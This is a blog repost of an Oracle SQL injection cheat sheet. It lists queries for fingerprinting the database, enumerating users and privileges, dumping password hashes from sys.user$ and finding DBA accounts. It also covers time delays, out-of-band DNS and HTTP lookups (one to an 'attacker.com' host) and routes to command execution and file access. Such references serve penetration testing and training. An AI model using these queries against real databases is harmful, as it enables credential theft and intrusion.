Oracle SQL Injection Cheat Sheet

最新推荐文章于 2024-07-30 19:26:47 发布

conghai7026

最新推荐文章于 2024-07-30 19:26:47 发布

阅读量162

点赞数

文章标签：数据库 java 网络

From:

http://www.darkc0de.com/cheatsheets/oracle-cs.shtml

version---------------------------

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';

SELECT banner FROM v$version WHERE banner LIKE 'TNS%';

SELECT version FROM v$instance;

Current User ----------------------------

SELECT user FROM dual

List Users------------------------------------

SELECT username FROM all_users ORDER BY username;

SELECT name FROM sys.user$;

List Password Hashes---------------

SELECT name, password, astatus FROM sys.user$ --priv 10g

SELECT name,spare4 FROM sys.user$ -- priv, 11g

List Privileges --------------

SELECT * FROM session_privs; -- current privs

SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs

SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv

SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

List DBA Accounts--------------------------------

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles

Current Database -----------------

SELECT global_name FROM global_name;

SELECT name FROM v$database;

SELECT instance_name FROM v$instance;

SELECT SYS.DATABASE_NAME FROM DUAL;

List Databases---------------------

SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)

-- Also query TNS listener for other databases. See tnscmd (services | status).

List Columns -------------------------

SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';

SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and wner = 'foo';

List Tables------------------------------

SELECT table_name FROM all_tables;

SELECT owner, table_name FROM all_tables;

Find Tables From Column Name--------------

SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case

Select Nth Row-------------------------

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1)

Select Nth Char

SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'

Bitwise AND

SELECT bitand(6,2) FROM dual; -- returns 2

SELECT bitand(6,1) FROM dual; -- returns0

ASCII Value -> Char-------------

SELECT chr(65) FROM dual; -- returns A

Char -> ASCII Value---------

SELECT ascii('A') FROM dual; -- returns 65

Casting---------------------------------

SELECT CAST(1 AS char) FROM dual;

SELECT CAST('1' AS int) FROM dual;

String Concatenation-------------------

SELECT 'A' || 'B' FROM dual; -- returns AB

If Statement--------------------------------

BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements

Case Statement-------------

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1

SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2

Avoiding Quotes ------------------

SELECT chr(65) || chr(66) FROM dual; -- returns AB

Time Delay ---------------------------

BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse looks are slow

SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow

SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow

-- Also see Heavy Queries to create a time delay

Make DNS Requests---------------------------------

SELECT UTL_INADDR.get_host_address('google.com') FROM dual;

SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;

Command Execution--------------------------------

Java can be used to execute commands if it's installed.

ExtProc can sometimes be used too, though it normally failed for me. :-(

Local File Access----------------------------

UTL_FILE can sometimes be used. Check that the following is non-null:

SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';

Java can be used to read and write files if it's installed (it is not available in Oracle Express).

Hostname, IP Address-----------

SELECT UTL_INADDR.get_host_name FROM dual;

SELECT host_name FROM v$instance;

SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames

Location of DB files---------------

SELECT name FROM V$DATAFILE;

来自 “ ITPUB博客 ” ，链接：http://blog.itpub.net/230160/viewspace-617779/，如需转载，请注明出处，否则将追究法律责任。

转载于:http://blog.itpub.net/230160/viewspace-617779/

conghai7026

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Oracle SQL Injection Cheat Sheet

From:http://www.darkc0de.com/cheatsheets/oracle-cs.shtmlversion---------------------------SELECT banner FROM v$ver...
复制链接

扫一扫